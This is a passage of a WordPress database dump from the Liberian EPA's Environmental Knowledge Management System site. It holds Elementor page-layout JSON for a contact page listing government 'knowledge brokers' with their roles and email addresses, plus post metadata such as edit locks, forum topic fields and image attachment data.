Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14963,2375,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:35;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:32;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:14;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:11;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:16;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:15;s:21:\"typography_typography\";i:14;s:20:\"typography_font_size\";i:14;s:5:\"align\";i:15;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:6;s:10:\"image_size\";i:5;s:22:\"image_custom_dimension\";i:4;}}}}}'),(14965,2376,'_edit_lock','1573853604:1'),(14966,2376,'_edit_last','1'),(14967,2376,'_elementor_controls_usage','a:0:{}'),(14968,2376,'_bbp_forum_id','0'),(14969,2376,'_bbp_topic_id','2376'),(14970,2376,'_bbp_author_ip','41.191.107.133'),(14971,2376,'_bbp_last_reply_id','0'),(14972,2376,'_bbp_last_active_id','2376'),(14973,2376,'_bbp_last_active_time','2019-11-15 21:34:51'),(14974,2376,'_bbp_reply_count','0'),(14975,2376,'_bbp_reply_count_hidden','0'),(14976,2376,'_bbp_voice_count','0'),(14977,1814,'_edit_lock','1573859335:1'),(14978,1813,'_edit_lock','1573859607:1'),(14979,1810,'_edit_lock','1573859785:1'),(14980,1809,'_edit_lock','1573859859:1'),(14981,1808,'_edit_lock','1573860035:1'),(14982,1683,'_edit_lock','1573860505:1'),(14983,2379,'_wp_attached_file','2019/11/featured_home5.jpg'),(14984,2379,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:26:\"2019/11/featured_home5.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_home5-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_home5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_home5-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1538143250\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"8.9\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14985,482,'_thumbnail_id','2379'),(14986,1681,'_edit_lock','1573860632:1'),(14987,1679,'_edit_lock','1573860862:1'),(14988,1807,'_edit_lock','1573861040:1'),(14989,1806,'_edit_lock','1573861420:1'),(14990,1805,'_edit_lock','1573861343:1'),(14991,1804,'_edit_lock','1573861430:1'),(14992,1803,'_edit_lock','1573861628:1'),(14993,1802,'_edit_lock','1573861743:1'),(14994,1801,'_edit_lock','1573862892:1'),(14995,1800,'_edit_lock','1573862984:1'),(14996,1799,'_edit_lock','1573863051:1'),(14997,1798,'_edit_lock','1573863135:1'),(14998,1797,'_edit_lock','1573863243:1'),(14999,1796,'_edit_lock','1573863604:1'),(15000,1356,'_edit_lock','1573868083:1'),(15027,2384,'_wp_page_template','elementor_canvas'),(15028,2384,'_elementor_edit_mode','builder'),(15029,2384,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Join the 